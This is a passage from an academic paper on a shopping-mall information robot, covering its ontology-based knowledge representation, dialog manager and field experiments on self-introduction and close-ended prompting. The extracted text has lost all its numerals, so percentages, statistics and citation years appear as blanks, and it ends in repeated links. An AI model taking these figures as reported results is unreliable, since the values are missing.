siri) that provide information related to location. there are many similar aspects between our robot and such applications, e.g., both need connection between language and local knowledge, interpretation needs to be contextual, and answers to be provided in verbal way. thus, similarly to these approaches, we used ontology (mcguinness & van harmelen, ) to build the knowledge representation. however, we need to build our own knowledge representation because required the knowledge structure is different, and we cannot simply apply existing software like google search and siri for the robot. for instance, robots can use pointing gesture (also, often robots are not equipped with display), which very much changes the way of giving direction. information in a shopping mall we investigated the daily tasks of information service employees and what visitors typically expect from robots acting as such. we found a lot of similarities. the study protocol was approved by institutional review boards of advanced telecommunications research instituted international with reference number - - . daily tasks of information service we interviewed two employees working at the information desk of a shopping mall. first we asked an overall description of their job: they usually wait for visitors to come to the information booth. they were requested by the mall administrators to serve as ‘information staff.’ only procedures for lost items were provided; for other tasks (e.g., information providing) they use their common sense. further, we asked them to categorize the typical requests from visitors, and how they would respond. both reported that there are three types of requests: direction giving: they reported that this is the most frequent request. visitors ask simple where-type questions, e.g., “where are the toilets?” in addition to the name of locations, people use other popular name, like “hello show,” or the name of designated areas, like “smoking area.” their typical response is to provide turn-by-turn directions using utterance and pointing gesture. when visitors do not understand, they sometimes write down to a map, or on rare occasions take them to the destination. recommendation (inquiry): when a visitor does not know whether there are shops that meet his needs, he may query the information staff. visitors may inquire of the characteristics of shops, such as name of items, and the category of shops. here are some examples of questions: “are there japanese restaurants?”; “are there shops that sell osaka souvenirs?” the staff members typically verbally list the shops or events that meet their criteria. visitors sometimes ask for a recommendation from the staff without providing satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. solid conditions but only using subjective words e.g., “are there any good restaurants?” for such requests, the staff members reported that they typically try not to give a subjective preference, because their preferences may or may not match with those of the visitors. thus, their responses for inquiry and recommendation are similar: they try to objectively reply and provide a list of shops that seem appropriate. lost child and lost-and-found: when children are lost, or when visitors lose items, they come to the information desk. for lost children, the staff usually makes a public announcement throughout the shopping mall. lost items can be retrieved at the information booth when available upon confirmation of ownership. expectations from information robot to investigate what people expect from information robots, we interviewed customers in the shopping mall. to find people who would be willing to help us with collecting knowl- edge for future robots, we prepared a situation where visitors can see a robot in the midst of interaction. thus, we prepared a robot for information, which is controlled with wizard- of-oz method. we then asked people who stopped around the robot and/or interacted with it to participate in the interview. twenty-one visitors participated in the interview. in the interview, we asked the visitors to imagine future situations in which robots would be capable of offering information services they like, regardless of their previous observations of the robot’s capability. we then asked them to freely provide as many functions they would like information robots to have. the interviews were recorded and transcribed for analysis. we categorized the different kind of requests expressed by the visitors, for instance, visitors reported sentences such as: “i often look for the smoking area, thus i would like to ask the robot about it.” this utterance was coded as expectation for direction giving, because we interpret it as ‘where’-type question in which visitors simply want to know the location. the followings ones were coded as expectation for recommendation (inquiry): “i’d like to know about sports and furniture shops.” “the shop which sells the most? well, i want the robot give me recommendations of shops.” such cases were classified as recommendation (inquiry), because visitors need to know more information than just a location. then, two coders who do not know the research purpose judged whether each transcribed sentence would fit into the above defined categories, or not (which is categorized as ‘other’). the judgement of the two coders matches reasonably well, yielding kappa coefficient . . table shows the coding result. the ratio of visitors who mention the expectation is listed in each row. they can provide multiple answers, thus the sum of the ratios exceeds %. the expectation of the visitors for the information robot largely overlaps with what human information services provide. almost all visitors ( out of ) mentioned that they expect direction giving and the majority ( out of ) reported that they expect the satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table the analysis result of expectation for information. expectation ratio direction giving . % recommendation (inquiry) . % other playing with children . % lost child . % robot to offer turn-by-turn direction accompanied with pointing gesture. for instance, one spontaneously mentioned the practicality of pointing gesture in directions giving: “well, ‘where,’ umm, i did not understand ‘which’ direction i should go. so it would be useful if the robot could do pointing gestures,” there were visitors who expected the robot to take them to the destination, and visitor who wanted the robot to explain with a map. there were people that expected a recommendation service. for instance, some mentioned “i’d like to have some recommendations for restaurants,” or “i’d like to know places where children can play around.” others wanted to have more detailed explanations. for instance, one commented: “i’d like to know what kind of shop it is, its atmosphere, what it sells, and so on.” in contrast, the ‘playing with children’ category is specific to the information robot. we collected comments such as: “interacting with the robot was enjoyable. this is good for people who come with their children”. “many families only have one child. it would be nice if the robot behaved like a brother.” requirements the expectations for information robots largely overlapped with what is delivered at human information services. that is, most of them expect two services: direction giving and recommendations. thus, in this study, we focused on these two services. further, we investigated the required knowledge to be stored. we analyzed the utterances of the requests. we labeled them based on the type of request. for instance, we assigned a label ‘name of location’ to the utterance “i’d like to know where the event dream world takes place,” ‘name of item’ to the utterance “i’d like to know where can i buy coffee.” if multiple labels are applicable we assigned all of them. labels are merged when possible, resulting in different labels. to confirm the classification, we asked two coders who did not know the purpose of the research to classify the utterances based on the labels. their coding matches reasonably well, yielding kappa coefficient of . . finally, we identified that the following information is needed: ( ) name of location: such as names of shops or names of events. in addition to the formal name, people use various nicknames. . % of people mentioned this category. satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure system architecture. ( ) item name: people look for specific product or entity available in shops. for instance, this category includes items such as “cell phone charger” and “coffee.” . % of people mentioned this category. ( ) category: shops can usually be grouped into larger categories, like “restaurant,” “japanese restaurant.” . % of people mentioned this category. ( ) features: shops are usually recognized as some generally-known features, like “good view,” “expensive,” and “recommended.” . % of people mentioned this category. ( ) people activity: locations are sometimes referred as the activity that people do there, like “play,” “eat,” “shop.” . % of people mentioned this category. ( ) people’s state: locations are sometimes referred as the place appropriate for people’s physical condition, like “injured,” “tired,” “hungry.” for instance, some visitors said: “i would like to receive recommendation, just by saying ‘i’m hungry’ for example.” . % of people mentioned this category; note that this request was not reported by the information desk staff, thus it can be considered as specific to the information robot. based on this analysis, we developed the knowledge representation for the information robot. system architecture our goal is to develop a robot that autonomously provides information services. based on the analysis in section ‘information in a shopping mall,’ we developed a knowledge representation that can be used by such a robot. figure shows the architecture of the system. information from sensors goes through modules like people tracking (explained in section ‘people tracking’), localization (section ‘localization’), and speech recognition (section ‘speech recognition (with human operator)’). output from these modules are used in the behavior controller (section ‘behavior controller’), which contains a dialog manager (section ‘dialog manager’). the environmental knowledge is stored in ontology (section ‘ontology of entities in the map’) and map (section ‘route perspective map’), and used by the dialog manager. we explain these modules in the later section. satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure environment of the shopping mall. figure knowledge representation for the environment. knowledge representation there are two types of information in the knowledge representation. one is the map used for direction giving (explained in section ‘route perspective map’). the other is shop-related data (explained in section “ontology of entities in the map’). environment the study was conducted in a big shopping mall located in a suburban area. it consists of three buildings (fig. a), one having floors, and others having floors. there are shops, restaurants, facilities, event halls, squares (e.g., fig. b), stages, and many offices. the mall is mainly busy during weekends. almost all shops are for non-daily goods, like clothes, shoes, sports, outdoor activities. we often observe people who look for shops and locations (e.g., they look at the floor maps, and/or ask the service staff ). the main hall where big events take place is located far (a min of walk) from the square where we put the robot, thus people often asked where an event was taking place. ontology of entities in the map we designed our knowledge representation for ‘request’ and ‘shops’ together using an ontology language, owl (mcguinness & van harmelen, ). figure shows the designed knowledge structure, i.e., ontology. the basic element in owl is the ‘class,’ which has ‘properties’ that store the information. there are two primary classes, ‘location entity’ and ‘requestable property’ prepared. satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table possible relationships. users’ request possible relation item name is sold at/is served at/is at category belongs to features is a feature of people activity is possible at people’s state is satisfied/healed/solved at location entity we define entities like shops, facilities and events as instances of the ‘location entity’ class. there are three properties: ( ) name: we stored the official or commonly used name. ( ) nicknames: some shops are referred to with a nickname. we listed such nicknames people could use. for example, “kentucky fried chicken” is referred as “kfc.” ( ) location on the geometrical map: each location is associated with the geometrical map (explained in the section ‘route perspective map’). we further separate the class into two subclasses, selective location and non-selective location. when multiple locations are available, people would prefer to select one. for instance, if there are two italian restaurants, people would choose one based on their own criteria, such as better, cheap, popular, etc. we store one extra property, ‘introduction property,’ in selective location to be used in dialog to help people selecting locations. in contrast, people would usually not care about which toilets to which they would go. such locations are implemented as non-selective location class. requestable property there are six types of information communicated in information dialog (section ‘requirements’). except for name of location, they are realized as ‘requestable property’ class, which has subclasses ‘item name,’ ‘category,’ ‘features,’ ‘people activity,’ and ‘people’s state.’ when a user requests information, it is turned into an instance of the ‘requestable property.’ then, the location(s) having the same property will be searched. each property item has wordings that are expected to be used in people’s utterance. for instance, ‘eat’ (instance of people’s activity subclass) is associated with wordings such as “eat,” “have lunch,” and “have a meal.” note that more complex requests (e.g., “japanese” restaurant with a “good view”) can be represented as multiple instances combined with ‘and/or’ operators, but we did not implement such complex operations because users rarely made such complex requests. relationships between ‘location entity’ and ‘requestable property’ table shows possible relationships between two subclasses. for instance, some visitors could request a restaurant where they can have “pasta.” to handle such requests, a “pasta” entity is prepared as an instance of ‘item name’ subclass which is associated with shops with satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure illustration of the route perspective map. the relation ‘is served at.” such relation is defined inside dialog management (section ‘be- havior controller’) as well. note that an instance of ‘requestable property’ can be associated with multiple ‘location entities’ (e.g., “pasta” can be served at multiple restaurants). finally, we prepared the data for the shopping mall (section ‘environment’). there are location entities ( shops, service facilities, events, and buildings) with in total , nicknames. there are requestable properties ( items, categories, features, people activities, people’s states) prepared as well. route perspective map informed by morales et al. ( ), we manually prepared a route perspective map (illustrated in fig. ), which consists of pairs of landmarks and actions. using the map, the system generates turn-by-turn directions giving, such as “go straight, turn left at the book store, go out the door with exit sign . . . .” the map includes the following information: ( ) topological map: nodes are located at decision points in the map. transition through corridor or between different floors, such as stairs, escalators, and elevators, are expressed as movements between nodes. entrances of shops, facilities, and events (i.e., location entity) are also represented as nodes. ( ) landmarks: if available, visible landmarks are manually associated for each route as denoted in morales et al. ( ), e.g., famous shop names with salient signboards, elevators, and escalators. ( ) actions: in morales et al. ( ), actions were only turning behaviors, which were computed from a topological map. in contrast, as there are many floors and multiple buildings, we added actions like “enter the next building,” “go to the rd floor.” satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. behavior controller when a person stops by the robot (within . m for . s), or is detected as approaching at . m from it, it starts a dialog. the robot orients its body and gaze to the user. when there is no user, the robot shows liveliness by slightly moving head and arms. during the dialog, its head and body is oriented toward the user, except for the moment when it performs a pointing gesture which is often used when giving directions. when it points at a direction, its head direction is oriented toward the pointed direction for the first three seconds of pointing in order to draw the user’s attention toward the pointed direction. the robot ends the dialog when the user leaves the robot’s side ( m away), or when the dialog management module decides to end the dialog. dialog manager we developed a rule-based mechanism for dialog management. assuming that there is an input coming from the speech recognition module (explained in ‘speech recognition (with human operator)’), the input is turned into text and matched with name/nickname properties of location entities and with instances of requestable properties (explained in ‘ontology of entities in the map’). if a requestable property matched, it is compared with location entities. when only non-selective locations are matched, it chooses the nearest one. in case the user asked for a location with a specific name of location, there should be only one location to be matched. in these cases, the system provides direction-giving dialog, in which turn-by-turn directions to the location are generated. otherwise, it initiates a recommendation dialog. it verbally lists the locations that match with the requestable property instance one by one. for each location, it explains the location using the text in its introduction property. for instance, it utters “ramen is served at a ramen restaurant named kaika-ya. they serve a ramen with tuna soup. may i explain the directions to go there?” as human staff does, we carefully avoid telling subjective preferences, but only provided objective facts. in addition, it reacts to the words for greeting. when an input matches with words like “hello,” it returns a greeting utterance. when an input matches with leave-taking words like “bye,” it returns leave-taking words and ends the dialog. when no location is matched, the system explains that “(requested item) is not in this shopping mall. i only know about this mall.” other modules robot we used a robot characterized by its human-like physical expressions. it is cm high and cm in diameter on a mobile platform. it has a -dof head and -dof arms. there are two m range laser sensors attached. we used the robot with a maximum speed of mm/sec and ◦/s for rotations. the accelerations are set to mm/s and ◦/s . to clearly communicate its role, we put an ‘information staff ’ sign in japanese on the chest of the robot (fig. ). satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. people tracking we use a people tracking method described in brscic et al. ( ), which provides an estimation of the location of pedestrians every ms. it covers the square we used. there are -d range sensors attached on the ceiling (combination of panasonic d-imager, asus xtion, and velodyne hdl- e). localization for robot localization, we use a particle filter with a ray tracing approach on a grid map (fox, burgard & thrun, ). the grid map is built from odometry and laser scanner data. this module is called every ms and updates the robot’s position. speech recognition (with human operator) we developed fully-autonomous system using asr (automatic speech recognition), but in order to better test the overall framework we used a human operator instead of asr. automatic speech recognition (asr). we used an asr software, atrasr (matsuda et al., ). it uses a language model based on fsa (finite state automaton). we constructed the language model mainly using the terms appeared in the ontology. with preliminary trials using the wizard-of-oz approach, we analyzed the way visitors speak to the robot. in total, requests collected over days of preliminary trials. from the analysis of the requests, we found that they mainly follow three ways of speaking, as follows: • noun/adjectives only: people only spoke words like a name (nickname) of location, category, or item name, such as “restaurant,” and “coffee.” sometimes, for features and people’s activity, they add such terms like “place for” (eat/lunch/play). some ontology items are adjectives, such as “tired.” people sometimes only spoke such adjectives. • “where is” question: the above noun is used in “where is” question, such as “where is kaika-ya (the name of restaurant) ?” • “i would like to” sentence: people also use the form of “i would like to” + “verb” + “noun” in requesting sentences, such as “i would like to buy coffee.” for all names, nicknames, and requestable properties, we automatically generated grammatical structures for asr. further, we added the following grammars. first, some basic verbs like “go” can be used in “i would like to” type sentences but were not included in the ontology (as they by themselves does not represent any specific request), which we manually added ( verbs). second, we added filler words, such as “well,” “ah,” that appear in advance to questions ( words). third, to eliminate noises from environments, like sounds from people’s walking, whistle from ships, we added some fillers ( fillers). overall, we prepared the lexicon whose size is , with , links. satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the asr outputs the matched names, nicknames, or requestable properties, which are used in the dialog manager to determine the answer to be provided. in case the asr detects the recognition to be less reliable (because the input does not match well with its language model), the dialog manager prompts the user to say again with utterances like “could you repeat please?” the asr is deactivated while the robot is speaking. we evaluated the system performance using this asr implementation. we put the robot on a square of the mall (fig. b), and let the visitors freely use it. with our preliminary test, with users, there are requests, for which the robot was only able to correctly respond in . % of the cases. (in a similar study only . % of successful recognition was achieved matsuda et al., .) there were types of errors: error in sound detection error (due to other ambient sounds, the system failed to detect the start of utterance) ( . %), asr resulted in low reliability score ( . %), utterance did not match with the prepared grammar/vocabulary ( . %), and mis-recognition in asr ( . %). in case the mis-recognition occurred, often the system seemed to be interfered by ambient noise, which was matched with some vocabulary in the lexicon. in contrast, in case asr successfully detected the names, nicknames, or requestable properties, the system provided appropriate answers. overall, this preliminary test revealed that the system is capable of handling users’ utterances when the asr is successful, while we would yet need to wait asr technologies to be ready for real world environments. wizard-of-oz. the system is ready for autonomous speech recognition. but, for this study, to focus on other parts of interaction rather than working for errors in speech recognition, we used a human operator only to support speech recognition. we strictly limit the task of the operator, and have him work like the dumb asr software described in the previous section. we did not allow the operator to add his knowledge. just like the output from the asr, the operator only typed the words spoken by the user. for instance, to our knowledge, if a user asks for a “place for lunch” but such wording is not in the system vocabulary, in previous studies wizard-of-oz operators replaced such words to the ones system can handle, like “restaurant”; by doing so, the system can work with a very limited vocabulary and knowledge. instead, with our system, a novice person who does not know the environment (e.g., list of shops) can easily serve as an operator. preliminary trials: lack of ‘knowledge’ for interaction we conducted a preliminary study with the system reported in the previous section. we initially intended to supplement missing data and evaluate its performance. we found the system itself worked well (we will report in section ‘evaluation of system performance’); however, interaction failed in other parts we did not think about. that is, some visitors responded in an unexpected way. in short, until this study was conducted, we focused on the ‘information’ aspect, which we found to be satisfyingly prepared, but we found a problem in ‘interaction.’ satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the interaction failed because the visitor did not speak. figure the visitor kept silent after prompted. here, we report two typical cases of failures. from these cases of failures, with a trial-and-error approach, we seek the reason why interaction fails and seek for better pattern of interaction for the problem. finally, we generate hypotheses about missing knowledge in interaction (to be reported in the next section). case : interaction did not start the initial version of the robot imitated the interaction of human information staff. it waited for the arrival of the visitors, and waited for them to make a request. this is what a human staff member would do. the signboard showing ‘information staff ’ on the chest of the robot was very visible, so we expected that every visitor would have common expectations as those investigated in section ‘expectations from information robot.’ however, frequently people would stay in front of the robot without saying anything. figure shows one of such cases. a man stopped in front of the robot, and the robot was ready to receive a request, orienting its body and head toward him; but, without talking to it, he moved to a side of the robot, and the robot followed. he moved back, and it followed again. finally, he left after s of silence. case : passive visitors further, we noticed that the conversation got stuck when it asked for a request, even though the user initially spoke to the robot. for instance, fig. shows a visitor who engaged in greeting, but came to be silent when prompted to ask request. she left after s of silence after being prompted. satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. we interpreted that such people do not have concrete requests in their mind, thus they were stuck when asked to offer requests. field experiment for each case of problems found in the preliminary trial (reported in the previous section), we generated a hypothesis, and conducted an experiment to confirm our idea to supplement such weakness. the study protocol was approved by institutional review boards of advanced telecommunications research instituted international with reference number - - . experiment hypothesis we initially replicated the way human staff interact with visitors. that is, we make it clear that the robot is serving as information staff. assuming that visitors have the common expectations the purpose of information staff we let the robot wait for a visitor to make a request, and to prompt to request if not asked. however, this assumption was not always correct. visitors may not share or may be unsure about their expectations of the ‘information robot’ role. if this is the case, we can probably moderate the problem by letting the robot first explain its role (direction giving and recommendation). thus, we made the following prediction: prediction : if the robot proactively explains its role as information staff, people will more frequently request information from it. participants the study was conducted during weekends. the participants were visitors of the shopping mall who are typically group of friends and families who come to the mall for leisure. the mall is big and the layout is complicated, thus people are often in real need of getting directions from someone. when a robot is placed on the mall, people sometimes stopped at the robot. we assumed that such people who stopped at the robot as the participants. condition there are two conditions compared. - with self-introduction: when a person stops, the robot starts self-introduction. it says, “hello, i can provide directions and recommendations.” then, it prompts him/her to request “may i provide you some information?” - without self-introduction: when a person stops, the robot waits him/her to request without speaking to the user. in both conditions, when a visitor requests it immediately moves into the information dialog. after s of silence, the robot closed the interaction saying “bye-bye.” procedure the robot was placed at a square of the mall (fig. b). we choose this location because visitors often arrive from the nearby escalator, and need direction giving around this satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. location. the study was conducted during daytime on weekends. we prepared six pairs of -minutes time slots. for each pair, two conditions were assigned. between the slots, we put -minutes break, so that visitors are not influenced by the adjacent time slot. the visitors of the mall were able to freely interact with the robot. there was a signboard showing ‘information staff ’ on the frontal side of the robot, which was clearly visible to the visitors. beyond that, there were no restrictions nor instructions provided to visitors. there was a person ensuring safety, but he stayed behind a column so that his presence was hardly noticeable from pedestrians. in such circumstances, we observed the pedestrians’ natural reaction to the robot. measurement considering the role of the information staff, we define the success of the interaction as follows: success: the case where the robot was able to receive a request and offered appropriate information/service. we coded the success from the recorded video. note that we only evaluated people who stopped in front of the robot (more than s) and faced towards it; we consider that letting people stop is beyond the scope of this paper. if the same person interacted multiple times, only the first one was evaluated. further, we only evaluated one participant per group (i.e., only the first member of the group, who stopped and faced the robot, was counted as our participant), so that the experiment would not suffer from other members’ prior interactions. result in total, there were interactions evaluated, which were coded by two coders who did not know the study hypothesis. one coded the whole data and the second one did confirmatory coding for % of the data. their coding results matches well (kappa coefficient . ). figure shows the result of the study. there were . % of the successful interactions in the with self-introduction condition, while . % in the without self-introduction condition. typical failure was, like the one shown in fig. , when visitors stayed in front of the robot but remained silent even if they were prompted to talk to the robot. some visitors left in the middle of the conversation, and some explicitly said they did not need service ( cases in with self-introduction condition). we applied a chi-square test to evaluate the ratio of success against failures. there is a significant difference between the conditions (χ ( ) = . , p < . , ϕc = . ). thus, prediction was confirmed. when the robot provides self-introduction, the interactions ended with success more frequently. we interpret that even though the robot serves an ‘information’ role, people should share a common expectation. unless it explains its role, some people might fail in using it. discussion it is plausible that there are two sources of failure addressed. one is the belief that the robot can talk to them; another is the expectation that it offers information. we mainly argued satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure result of the experiment . the second point, but it simultaneously offered help for the first element. thus, one would argue that it is better to compare with a robot that only speaks to users but does not provide self-introduction. however, it was not easy to prepare such a condition when the robot only shows the capability that it can talk in the context of information service. for instance, if it only greeted people, visitors might expect it to engage in variety of interactions, but in reality the robot can only react for the ‘information’ role. thus, although the effect would be due to both elements, we conducted the study in such a way. it remains as an open question what is the best length of self-introduction. we could make it short and only imply its task by saying something like “may i help you?” we consider that to our observation, people did not get bored due to length of the self-introduction and thus it could be considered as reasonable. experiment hypothesis in the experiment , we found that self-introduction moderated the problem of failure; yet, interaction failed for about % of the visitors. we hypothesized that there are visitors who initiated interaction out of curiosity, without a concrete request in mind. such people would be stuck when a robot prompts them for a request in a direct way. we hypothesized that we can moderate this problem, if the robot turns its offer into a question that they can easily answer. thus, we made the following prediction: prediction : if the robot prompts a user for a request in a way of questions they can easily answer, people will more frequently make requests to the information robot. participants the same procedure was used as in experiment . satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure result of the experiment . condition there are two conditions compared. in both conditions, when a person stops, the robot starts with a self-introduction, saying “hello, i can provide directions and recommenda- tions.” this is identical to the wording used in experiment . after a short pause, the robot utters “i will give recommendations based on the locations you are going to,” and prompts the user to ask. the prompting utterance differs depending on the following condition: - open-ended prompting: it prompts the user by saying “what kind of recommendation do you wish?” - close-ended prompting: it prompts the user by saying “where are you going?” in both conditions, whenever a visitor requests something to the robot, it immediately moves into the information dialog. if the user keeps silent for s, it once repeats the prompting utterance. if there were s of silence after the prompting utterance, the robot closed the interaction saying “bye-bye.” procedure the same procedure was used as in experiment . we prepared seven pairs of -minutes time slots. measurement the same measurement was used as in experiment . result in total, there were interactions evaluated, which were coded by two coders who do not know the study hypothesis. one coded the all data and second one did confirmatory coding for % of the data. their coding results matches well (kappa coefficient . ). figure shows the result of the study. there were . % of successful interactions in close-ended prompting condition and . % in open-ended prompting condition. similar to the experiment failure cases, some visitors kept silent when prompted, some visitors left satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. in the middle, and some explicitly said they did not need the service ( cases in close-ended prompting condition). we applied a chi-square test to evaluate the ratio of success against failures. there is a significant difference between the conditions (χ ( ) = . , p < . , ϕc = . ). the prediction was consequently confirmed. when the robot’s prompting was close-ended, the interaction was more frequently successful than open-ended prompting. we interpret that as predicted many visitors did not have requests in mind and got stuck when asked to request; instead, if the robot offered a prompting utterance that invited the user to talk about what they know (e.g., their destination), it will more easily continue the dialog and offer information requested by the user. discussion there are some open questions remaining. one would argue that those who kept silent are people who did not want to ‘hear’ the information, thus they did not respond to ‘hear’ questions in close-ended prompting. it is possible that they did not have that much will to spontaneously ask the robot to provide information; nevertheless, in open-ended prompting condition, people who were coded as success stayed until the robot finished providing information. one would also argue that the robot could anyway give information even if visitors kept silent. this is possible, and maybe the robot should do so for the remaining . % of people. our assumption is that it is probably better if they hear information they requested, rather than randomly chosen information. we could not fully clarify why the remaining . % of people who kept quiet in close-ended condition. we tried to interview such people, but they did not want to be interviewed. evaluation of system performance throughout the experiment and , the robot was controlled with the system reported in ‘system’. in total, there were requests made for the information robot. we analyzed how they were handled, and evaluated whether the robot’s responses were correct. . % of the case requests were a name of location and . % were a nickname. in the other cases, these requests were turned into requestable properties: there were . % item name, . % category, . % feature, . % people activity, and . % people’s state. in . % of cases, the system provided direction-giving service, and . % recommendation service. the appropriateness was evaluated by coders who do not know the study hypothesis. they judged based on the following criteria: correct: the information the user requested is included and correct in the response from the robot. for instance, when a user asked “are there japanese restaurants?” the coder judged whether the robot provided the information about any japanese restaurant (if any), and whether the provided information is correct. there coding results show moderate matching (kappa coefficient was . ). there were . % of cases judged as correct. incorrect cases were caused by the lack of nickname ( cases), users who left before information was provided ( cases), operator’s mistype ( cases), and complex requests which the system was unable to handle satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure a scene of correct and successful interaction. ( case). overall, we believe that the system was able to cover the requests from users reasonably well. figure shows one of example of scene of interaction where the robot provided correct information. she asked a ‘where’ question using the name of a furniture shop, which was matched with the location entity instance of the furniture shop. thus, the robot provided the direction to the shop while pointing the direction. she listened to the direction while looking at the robot. when the robot pointed, she looked at the pointed direction. finally, she said “thank you!” to the robot, and walked to the pointed direction. figure shows a scene where visitors’ requests were based on their physical state. they only said, “i’m hungry.” the robot was able to associate it to restaurants, so it recommended ramen restaurant. they requested it to provide directions to the restaurant, and the robot pointed the direction end explained the route. overall, the system worked reasonably well. limitation the content of knowledge can be local to the specific environment, robot, language, culture, and so on. the common sense about what the information service is would differ across cultures. thus, if our study results were to be applied somewhere else, although we believe that most of the framework and structure of knowledge is pertinent, we would probably need to carefully adjust the knowledge. for instance, it is plausible that people in other cultures would inquire information with a different form. knowledge about interaction would also differ. people in other cultures can be more or less open, active, hesitate, and/or curious, thus the effectiveness of such strategy can be different. satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure request made based on visitors’ state. conclusion we investigated the knowledge relevant to information robot. first, we confirmed that what visitors expect for an information robot well overlapped with what human information staff do. we developed a knowledge representation for information robot. our field study confirmed the knowledge representation was useful. when users requested, the robot was able to provide information with . % of success. however, it also revealed that many people did not behave in the same way as they did with human staff. our initial version of interaction flow only allowed . % of success in providing information, while visitors in failure kept silent during the interaction. through our field experiments, we found that some people need the robot to provide self-introduction about its role, and some people need close-ended prompting, i.e., letting users talk about what they know to make a request, instead of letting them generate a request. finally, the robot was able to provide information for . % of visitors. what we changed might be subtle, yet it changed the results quite a bit. acknowledgements we thank the staff of the atc shopping mall for their support. additional information and declarations funding this work was supported by the japan science and technology agency (jst) and its crest program. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the following grant information was disclosed by the authors: japan science and technology agency (jst). crest. competing interests takyuki kanda is an academic editor for peerj computer science. satoru satake, keita nakatani, kotaro hayashi, and takyuki kanda are employees of intelligent robotics and communication laboratories (irc), advanced telecommunications research institute international (atr). author contributions • satoru satake conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work. • keita nakatani performed the experiments, analyzed the data, prepared figures and/or tables. • kotaro hayashi performed the experiments, prepared figures and/or tables. • takyuki kanda conceived and designed the experiments, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. • michita imai contributed reagents/materials/analysis tools. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the study protocol was approved by institutional review boards of advanced telecom- munications research instituted international with reference number - - . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references brscic d, kanda t, ikeda t, miyashita t. . person tracking in large public spaces using d range sensors. ieee transaction on human-machine systems : – doi . /thms. . . cassell j, stocky t, bickmore t, gao y, nakano y, ryokai k, tversky d, vaucelle c, vilhjálmsson h. . mack: media lab autonomous conversational kiosk. in: proceedings of imagina, vol. , – . available at http://alumni.media.mit.edu/∼tstocky/pubs/cassell.stocky imagina .pdf. daniel m-p, tom a, manghi e, denis m. . testing the value of route directions through navigational performance. spatial cognition & computation : – doi . /s scc . fox d, burgard w, thrun s. . markov localization for mobile robots in dynamic environments. journal of artificial intelligence research : – . satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. 